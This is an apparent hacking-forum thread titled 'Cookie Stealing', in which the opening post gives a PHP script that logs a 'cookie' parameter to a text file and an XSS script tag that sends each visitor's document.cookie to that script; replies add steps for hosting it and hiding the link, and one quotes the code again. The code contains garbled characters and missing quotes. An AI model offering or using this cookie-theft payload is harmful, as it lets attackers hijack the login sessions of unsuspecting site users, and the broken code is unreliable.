Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Cookie Stealing filter_list
Author
Message
Cookie Stealing #1
In this tutorial you'll learn how to steal someones login cookie.
Open notepad.
There type:
<?php
$cookie = $_GET['cookie'];
$log = fopen( log.txt , a );
�
�
� �
fwrite($log, $cookie . \n );
�
�

fclose($log);
?>
After that save is at .php.
Than go to a site where you want to steal login cookies.
Than make a post which should look like this:
<script>
document.location = http://linkofyourphp.php?cookie= + document.cookie;
�
�

</script>
Than who enters there will send you his login cookie for that site.Login cookie will be in .txt file.
I hope that works for you.
Comment Smile

Reply

RE: Cookie Stealing #2
I think you might have some missing characters, those question mark thingies look odd.

Reply

RE: Cookie Stealing #3
Dear its not a full method...............you missed the important step........................

1.a php hosting web...
2. cookie stealer.php file
3.lof.txt file (chm777)
4.fake reffernce link to your stealer page..( i.e elite.gif)


any way nice try..........

Reply

RE: Cookie Stealing #4
(05-02-2011, 01:47 PM)farhan411 Wrote: Dear its not a full method...............you missed the important step........................

1.a php hosting web...
2. cookie stealer.php file
3.lof.txt file (chm777)
4.fake reffernce link to your stealer page..( i.e elite.gif)


any way nice try..........

But everybody knows that he needs to upload it to a hosting site Biggrin

Reply

RE: Cookie Stealing #5
dear where is your receiver text file with ch777 mode???dear you just told to make a txt file...
dear where is your receiver text file with ch777 mode???dear you just told to make a txt file...any way thanks dear

Reply

RE: Cookie Stealing #6
(05-06-2011, 08:10 PM)farhan411 Wrote: dear where is your receiver text file with ch777 mode???dear you just told to make a txt file...
dear where is your receiver text file with ch777 mode???dear you just told to make a txt file...any way thanks dear

are you trying to look pro or what? I mean, he told you to make the text file, you can even see it from the actual code itself and chmoding is pure logic... oh and it doesn't have to be 777, 777 actually makes the file unsecure, 222 is better since its just write, or 722 so the owner has all rights Smile


At OP:
Nice guide!!!! I would just add one small thing, just a little info how to find out, if the site is vuln to XSS Smile
Staff will never ever ask you for your personal information.
We know everything about you anyway.

Reply

RE: Cookie Stealing #7
This is Old but still working

Reply

RE: Cookie Stealing #8
Ahhh the script part at the end always evaded me. This is very nice for future reference.

Reply

RE: Cookie Stealing #9
I think, Nothing will work if the site is not vulnerable to XSS .

Reply

RE: Cookie Stealing #10
(04-29-2011, 08:40 PM)HeR97 Wrote: In this tutorial you'll learn how to steal someones login cookie.
Open notepad.
There type:
<?php
$cookie = $_GET['cookie'];
$log = fopen( log.txt , a );
�
�
� �
fwrite($log, $cookie . \n );
�
�

fclose($log);
?>
After that save is at .php.
Than go to a site where you want to steal login cookies.
Than make a post which should look like this:
<script>
document.location = http://linkofyourphp.php?cookie= + document.cookie;
�
�

</script>
Than who enters there will send you his login cookie for that site.Login cookie will be in .txt file.
I hope that works for you.
Comment Smile
its working on every site?or its working only on sites which are not protected?


Reply







Users browsing this thread: 1 Guest(s)